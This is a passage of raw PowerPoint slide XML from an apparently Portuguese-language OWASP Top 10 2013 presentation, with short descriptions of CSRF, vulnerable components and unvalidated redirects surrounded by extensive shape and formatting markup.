                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>vulnerável</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>aceite</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>como</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>requisições</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>legítimas</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>realizadas</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>pela</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>vítima</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="6616181"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A8 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>– </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Cross-Site Request Forgery (CSRF)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="7495636"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>Componentes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>tais como bibliotecas, frameworks, e outros módulos de software quase sempre </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>são executados </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>com privilégios </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>elevados. Se um componente vulnerável é explorado, um ataque pode </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>causar </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>sérias perdas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>de dados ou </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>o comprometimento do </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>servidor. As aplicações que utilizam </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>componentes com vulnerabilidades conhecidas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>podem minar as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>suas defesas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>e permitir uma gama de possíveis ataques e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>impactos.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="7419162"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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algn="ctr" defTabSz="533400">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A9 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>– Utilização </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>de C</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>omponentes Vulneráveis Conhecidos</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="8298617"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>Aplicações web frequentemente redirecionam </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>encaminham </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>usuários para outras páginas e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>sites, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>usam </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>dados não confiáveis para determinar as páginas de destino. Sem uma validação adequada, os atacantes </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>podem </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900"/>
                <a:t>redirecionar </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" smtClean="0"/>
                <a:t>as vítimas </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>para </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>sites </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>de phishing ou </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>malware, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>ou usar </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>encaminhamentos </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>para acessar páginas não autorizadas.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="8222143"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>A10 – Redirecionamentos e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>Encaminhamen-tos </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>Inválidos</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Riscos de Segurança em Aplicações – 2013 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25065882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5" name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1803321540"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957263"/>
          <a:ext cx="6858000" cy="2708753"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="590401">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="45720" marT="45728" marB="45728">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r>
              <a:tr h="3962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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
